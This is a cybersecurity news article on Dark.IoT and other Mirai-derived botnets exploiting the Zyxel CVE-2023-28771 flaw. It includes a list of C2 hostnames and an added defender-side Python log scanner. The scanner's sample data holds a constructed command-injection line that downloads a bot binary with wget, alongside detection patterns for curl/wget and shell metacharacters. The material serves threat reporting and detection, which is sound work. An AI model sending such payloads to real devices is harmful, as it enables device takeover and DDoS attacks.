Dark.IoT & Custom Botnets Exploit Zyxel Flaw in DDoS Attacks
By Waqas
The DDoS attacks have been observed in various regions, including Central America, North America, East Asia, and South Asia.
The Dark.IoT botnet is a variant based on the Mirai botnet that first surfaced in August 2021 and has since expanded its target beyond IoT devices.
In a recent report, FortiGuard Labs uncovered a concerning rise in Distributed Denial of Service (DDoS) botnets exploiting the Zyxel vulnerability CVE-2023-28771. The vulnerability, rated 9.8 on the CVSS scoring system, affects multiple firewall models and allows unauthenticated attackers to execute arbitrary code by sending a specially crafted packet to the targeted device.
The Zyxel vulnerability came into the spotlight in June 2023 when FortiGuard Labs detected the propagation of several DDoS botnets taking advantage of this security flaw. The flaw was initially reported by researchers from TRAPA Security, and Zyxel issued a security advisory on April 25, 2023. It was subsequently added to the Cybersecurity and Infrastructure Security Agency (CISA) Known Exploited Vulnerabilities (KEV) catalogue in May 2023.
However, FortiGuard Labs’ recent analysis indicated a significant increase in attack bursts starting from May, with multiple botnets involved, including Dark.IoT, a variant based on the notorious Mirai botnet. Additionally, another botnet employed customized DDoS attack methods.
Researchers were also able to identify the attacker’s IP address, revealing that the attacks occurred in various regions, including Central America, North America, East Asia, and South Asia.
Figure: Increasing activity of the botnet (FortiGuard Labs)
The attacks targeted the command injection vulnerability in the Internet Key Exchange (IKE) packet handling of Zyxel devices, reached through IKE packets received over UDP. Once the injection succeeded, the attackers used tools such as curl or wget to download scripts for further actions. These scripts were built for the MIPS architecture, indicating that the botnets were tailored to a specific class of device.
One of the identified botnets, Dark.IoT, made its appearance in 2021 and has since expanded its targeting beyond IoT devices.
The botnet employs the ChaCha20 cryptographic algorithm for encryption and utilizes multiple C2 (Command and Control) servers, including “raw.pastebin.com,” “hoz.1337.cx,” “babaroga.lib,” “dragon.lib,” “blacknurse.lib,” “tempest.lib,” “routercontroller.geek,” and “dvrcontroller.libre.”
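As an added defender-side example (not code from the FortiGuard report or from HackRead), the Python below scans log records for the two observable traits the report describes: shell metacharacters or curl/wget inside inbound IKE (UDP/500) payloads, and DNS lookups for the Dark.IoT C2 hosts listed above. The key=value log format, the field names and the addresses are assumptions; the sample records are constructed.

```python
import re
from dataclasses import dataclass

# C2 hostnames the report lists for Dark.IoT (from the article, not constructed).
DARK_IOT_C2 = {
    "raw.pastebin.com", "hoz.1337.cx", "babaroga.lib", "dragon.lib",
    "blacknurse.lib", "tempest.lib", "routercontroller.geek", "dvrcontroller.libre",
}
# Downloaders the report says the bots used after the injection, and shell
# metacharacters that have no business in an IKE (UDP/500) payload.
DOWNLOADER_RE = re.compile(r"\b(curl|wget)\b", re.IGNORECASE)
SHELL_META_RE = re.compile(r"[;`|&$]")

@dataclass
class Alert:
    line_no: int
    rule: str
    detail: str

def parse_kv(line):
    """Parse one constructed key=value log record; values may be double-quoted."""
    return {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', line)}

def scan(lines):
    """Return alerts for inbound IKE injection attempts and Dark.IoT C2 lookups."""
    alerts = []
    for n, line in enumerate(lines, 1):
        rec = parse_kv(line)
        if rec.get("dir") == "in" and rec.get("proto") == "udp" and rec.get("dport") == "500":
            payload = rec.get("payload", "")
            if DOWNLOADER_RE.search(payload) or SHELL_META_RE.search(payload):
                alerts.append(Alert(n, "ike_cmd_injection", f"src={rec.get('src')} payload={payload!r}"))
        if rec.get("type") == "dns":
            q = rec.get("query", "").rstrip(".").lower()
            if any(q == d or q.endswith("." + d) for d in DARK_IOT_C2):  # exact host or subdomain
                alerts.append(Alert(n, "dark_iot_c2_dns", f"src={rec.get('src')} query={q}"))
    return alerts

# Constructed sample records using RFC 5737 test addresses; not real captures.
SAMPLE_LOG = [
    'type=fw dir=in proto=udp src=198.51.100.7 dport=500 payload="4f1c9a2b SA KE NONCE"',
    'type=fw dir=in proto=udp src=203.0.113.9 dport=500 payload=";wget http://203.0.113.9/bot.mips"',
    'type=fw dir=out proto=udp src=10.0.0.5 dport=500 payload="wget"',
    'type=dns src=10.0.0.5 query=hoz.1337.cx.',
    'type=dns src=10.0.0.6 query=www.example.com',
]

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"line {a.line_no}: {a.rule}: {a.detail}")
```

Treat a hit on raw.pastebin.com as lower confidence than the other hosts, since legitimate traffic to it is common; the remaining names in the list are not ones a normal client should resolve.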
The presence of exposed vulnerabilities in devices poses significant risks, as threat actors can gain control over vulnerable devices and incorporate them into their botnets for further attacks, like DDoS assaults.
FortiGuard Labs emphasizes the importance of promptly applying patches and updates to mitigate these risks and ensure the security of IoT devices and Linux servers.
In light of these findings, it is crucial for organizations and users to stay vigilant and take proactive measures to protect their systems from potential exploits. Addressing vulnerabilities promptly is essential in safeguarding against DDoS botnet attacks and other malicious activities targeting vulnerable IoT devices.
As cybersecurity researchers continue to monitor and analyze emerging threats, raising awareness about the importance of security updates and best practices remains vital in safeguarding the digital ecosystem.
- Mirai Variant V3G4 Exploiting IoT Devices for DDoS Attacks
- DDoS Attacks Soar by 168% on Government Services, StormWall
- FortiGuard Labs Discovers .ZIP Domains Fueling Phishing Attacks
- IoT Botnet DDoS Attacks Threaten Global Telecom Networks, Nokia
- Chinese Gang Storm-0558 Hacked European Govt Emails, Microsoft
I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in the cyber security and tech world. I am also into gaming, reading and investigative journalism.
Related news
The cyber attacks targeting the energy sector in Denmark last year may not have had the involvement of the Russia-linked Sandworm hacking group, new findings from Forescout show. The intrusions, which targeted around 22 Danish energy organizations in May 2023, occurred in two distinct waves, one which exploited a security flaw in Zyxel firewall (CVE-2023-28771) and a
The out-of-bounds write vulnerability in the Windows-based SecuExtender SSL VPN Client software version 4.0.4.0 could allow an authenticated local user to gain a privilege escalation by sending a crafted CREATE message.
Russian threat actors have been possibly linked to what's been described as the "largest cyber attack against Danish critical infrastructure," in which 22 companies associated with the operation of the country's energy sector were targeted in May 2023. "22 simultaneous, successful cyberattacks against Danish critical infrastructure are not commonplace," Denmark's SektorCERT said [PDF]. "The
Several distributed denial-of-service (DDoS) botnets have been observed exploiting a critical flaw in Zyxel devices that came to light in April 2023 to gain remote control of vulnerable systems. "Through the capture of exploit traffic, the attacker's IP address was identified, and it was determined that the attacks were occurring in multiple regions, including Central America, North America,
This Metasploit module exploits a remote unauthenticated command injection vulnerability in the Internet Key Exchange (IKE) packet decoder over UDP port 500 on the WAN interface of several Zyxel devices. The affected devices are as follows: ATP (Firmware version 4.60 to 5.35 inclusive), USG FLEX (Firmware version 4.60 to 5.35 inclusive), VPN (Firmware version 4.60 to 5.35 inclusive), and ZyWALL/USG (Firmware version 4.60 to 4.73 inclusive). The affected devices are vulnerable in a default configuration and command execution is with root privileges.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday placed two recently disclosed flaws in Zyxel firewalls to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerabilities, tracked as CVE-2023-33009 and CVE-2023-33010, are buffer overflow vulnerabilities that could enable an unauthenticated attacker to cause a
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a recently patched critical security flaw in Zyxel gear to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. Tracked as CVE-2023-28771 (CVSS score: 9.8), the issue relates to a command injection flaw impacting different firewall models that could enable an unauthenticated attacker
Mirai Malware Hits Zyxel Devices After Command Injection Bug (HackRead, by Deeba Ahmed): A variant of the Mirai botnet is targeting Zyxel Firewalls after exploiting a newly patched operating system command injection vulnerability.
Zyxel has released software updates to address two critical security flaws affecting select firewall and VPN products that could be abused by remote attackers to achieve code execution. Both the flaws – CVE-2023-33009 and CVE-2023-33010 – are buffer overflow vulnerabilities and are rated 9.8 out of 10 on the CVSS scoring system. A brief description of the two issues is below - CVE-2023-33009 -
Networking equipment maker Zyxel has released patches for a critical security flaw in its firewall devices that could be exploited to achieve remote code execution on affected systems. The issue, tracked as CVE-2023-28771, is rated 9.8 on the CVSS scoring system. Researchers from TRAPA Security have been credited with reporting the flaw. "Improper error message handling in some firewall versions
Improper error message handling in Zyxel ZyWALL/USG series firmware versions 4.60 through 4.73, VPN series firmware versions 4.60 through 5.35, USG FLEX series firmware versions 4.60 through 5.35, and ATP series firmware versions 4.60 through 5.35, which could allow an unauthenticated attacker to execute some OS commands remotely by sending crafted packets to an affected device.